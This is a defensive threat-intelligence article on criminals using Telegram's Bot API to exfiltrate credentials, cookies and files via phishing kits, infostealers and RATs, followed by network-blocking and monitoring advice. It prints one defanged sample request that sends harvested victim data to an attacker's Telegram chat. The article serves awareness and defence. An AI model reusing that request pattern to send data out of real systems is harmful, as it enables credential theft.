Telegram is the world’s most abused legitimate communications platform for cybercrime. What began as an end-to-end encrypted messaging app for privacy-conscious users has been systematically weaponized by threat actors — using its own developer API to funnel stolen credentials, browser cookies, screenshots, and entire identity profiles directly into attacker-controlled chat rooms, in real time, with no specialized infrastructure required.

The mechanics are disarmingly simple. Telegram’s Bot API allows any developer to create automated accounts that can send messages, upload files up to 50 MB, and receive commands — all over standard HTTPS. For cybercriminals, this means data exfiltration that blends seamlessly into legitimate web traffic, is difficult to block without disrupting normal usage, and requires nothing more than a free Telegram account to set up.

The Scale of the Problem

Research published by Bitsight’s TRACE team offers a sobering snapshot of the ecosystem. Bitsight 2024 Beginning data collection in October 2024 and monitoring approximately 1,800 Telegram bots, researchers observed over five million victim logs — containing IP addresses, domain names, and credentials — with timestamps reaching back to 2020 but concentrated heavily from 2022 onward.

Industry-wide campaign tracking reinforces the trend. According to analysis by Security Boulevard covering Q1 2024 through Q2 2025, 3.8% of all malware-based Active Threat Reports (ATRs) designated Telegram as a command-and-control (C2) server, while 2.3% of all credential phishing ATRs did the same. Security Boulevard 2026

Telegram’s encrypted messaging, real-time communication, and ability to send large data files make it an ideal platform for cybercriminal activities — it has emerged as both a data exfiltration server and a marketplace for victim credentials.

— Bitsight TRACE Research Team

By early 2026, the scope had expanded dramatically. An analysis by the cryptocurrency tracing firm Elliptic, reported by WebProNews, estimated that Chinese-speaking criminal networks alone were processing $2 billion per month in illicit Telegram-based transactions — representing a 150% increase in transaction volumes since mid-2025. WebProNews Jan 2026

How the Attack Works

Threat actors exploit Telegram bots across multiple distinct attack vectors, each suited to different targets and levels of technical sophistication.

🎣

Credential Phishing

Fake login pages submit form data directly to a Telegram bot via the sendMessage API — no server required. Credentials arrive in the attacker’s chat room seconds after the victim types them.

🔑

Keyloggers & Infostealers

Malware harvests browser passwords, cookies, session tokens, and clipboard data, then uploads compressed archives via sendDocument — the attacker’s inbox fills automatically.

🖥️

Remote Access Trojans

RATs use Telegram as their C2 channel — receiving scripted payloads from bot-managed group chats and reporting victim system information, including IP address, geolocation, and browser fingerprint.

⛓️

Multi-Stage Payload Delivery

Some malware uses a bot’s own Telegram profile page to embed a second-stage payload URL, reducing the footprint of malicious infrastructure and evading blocklists.

Recent Campaigns & Malware Families

The threat is not theoretical. Multiple malware families documented by major security vendors in 2025 and early 2026 rely on Telegram as their primary exfiltration channel.

April – May 2025

PupkinStealer (.NET)

First observed in the wild in April 2025, this .NET infostealer runs five parallel asynchronous tasks on execution — harvesting Chrome, Edge, and other browser credentials simultaneously with Telegram and Discord session tokens, desktop files, and screenshots. All data is bundled into a ZIP archive and uploaded to an attacker-controlled Telegram bot in a single POST request. Picus Security May 2025

October 2025

Raven Stealer

Documented by Silobreaker, Raven Stealer harvests credentials, cookies, payment details, and browser data in real time, pushing them through Telegram. Notably, the malware was distributed via GitHub and promoted on its own Telegram channel — using the platform for both distribution and exfiltration. Silobreaker Oct 2025

May 2025

Advanced Phishing Kit Campaign

Documented by KnowBe4 Threat Lab, this campaign used dynamically branded phishing websites impersonating victims’ employers, combined with rapid domain rotation to defeat blocklists. Harvested credentials were transmitted in real time to attacker-controlled Telegram bots using configurable tokens and chat IDs — enabling account takeover within seconds of submission. KnowBe4 May 2025

Inside a Telegram C2 Request

The technical simplicity of Telegram-based exfiltration is what makes it so pervasive. A RAT reporting initial victim data to an attacker’s bot looks like this — a single HTTPS POST to Telegram’s own servers:

# POST to Telegram Bot API — sendMessage endpoint POST hxxps[://]api[.]telegram[.]org/bot[TOKEN]/sendMessage { "chat_id": "[ATTACKER_CHAT_ID]", "text": "Your file was downloaded from — Email: [REDACTED] IP Address: [REDACTED] Region: [REDACTED] City: [REDACTED] Country: United States User-Agent: [REDACTED]" } # Response confirms delivery to attacker's private chat room "ok": true, "message_id": 667

File exfiltration uses the sendDocument endpoint identically, uploading archives up to 50 MB — more than sufficient to contain thousands of scraped credentials, session cookies, and screenshots from a single compromised machine.

A Platform Responding — Slowly

Telegram’s posture toward law enforcement changed significantly in September 2024, when CEO Pavel Durov was arrested in France and subsequently released. The platform began cooperating with authorities, disclosing user identities behind illegal content including malware and phishing infrastructure.

The effect on criminal usage has been measurable. According to Netcraft’s 2025 research, the number of phishing sites using Telegram to transmit stolen data dropped sharply following Durov’s arrest and the platform’s increased enforcement activity. Netcraft Sep 2025 Monthly takedown figures since October 2024 have consistently exceeded the peak levels seen throughout all of 2023. Kaspersky Dec 2025

Yet the criminal ecosystem has adapted rather than collapsed. Netcraft observed threat actors pivoting to API-based email platforms such as EmailJS, and exploring Signal as an alternative — its end-to-end encryption makes platform-level moderation structurally impossible. Meanwhile, at the higher end of the market, Elliptic’s analysis shows high-value activities (zero-day trading, large-scale fraud) migrating back to reputation-gated dark-web forums where Telegram takedowns cannot reach them.

Current Threat Status

Despite Telegram’s increased cooperation with law enforcement, threat actors continue to actively exploit Telegram bots for credential theft and malware distribution as of March 2026. Organizations that do not legitimately use the Telegram Bot API should treat outbound connections to api.telegram.org/bot* as a high-confidence indicator of compromise.

What Defenders Should Do

The following measures are recommended by multiple security vendors and are consistent with current threat intelligence as of Q1 2026:

  • Block Telegram Bot API endpoints at the network perimeter. All Telegram bot traffic routes through api.telegram.org/bot{token}/METHOD_NAME. If your organization does not use Telegram bots legitimately, a blanket block on this endpoint will cut off a broad class of exfiltration malware, phishing kits, and RATs simultaneously.
  • Train staff to recognize phishing email patterns. Current campaigns use security-themed lures — unauthorized access alerts, settings updates — to create urgency. Employees should be taught to verify such messages through official channels before clicking any embedded link.
  • Monitor for outbound HTTPS POST requests to api.telegram.org. This traffic is unusual for most enterprise environments. Alert rules scoped to this domain will surface infections by keyloggers, infostealers, and RATs that use Telegram as C2.
  • Audit browser credential storage and session tokens. Modern infostealers like PupkinStealer complete their harvest in seconds. Organizations should evaluate whether browser-saved passwords represent an acceptable risk, and consider credential management policies accordingly.
  • Monitor underground channels for leaked organizational credentials. Given the scale of infostealer log marketplaces on Telegram and dark web shops, continuous monitoring for employee credentials appearing in breach data is now a standard defensive practice recommended by Kaspersky, Bitsight, and others.
  • Deploy AI-augmented email security. Traditional signature-based detection is increasingly ineffective against credential phishing kits that use rapid domain rotation and dynamically branded pages. Integrated cloud email security solutions with behavioral analysis now represent the recommended baseline.
✦ ✦ ✦

This article synthesizes findings from multiple security research sources including Bitsight TRACE, Picus Security, KnowBe4 Threat Lab, Netcraft, Kaspersky Digital Footprint Intelligence, Silobreaker, Security Boulevard, Flare, and WebProNews. All bot tokens and IP addresses referenced in technical examples have been obfuscated in accordance with responsible disclosure standards. This article is intended for security awareness and defensive purposes only.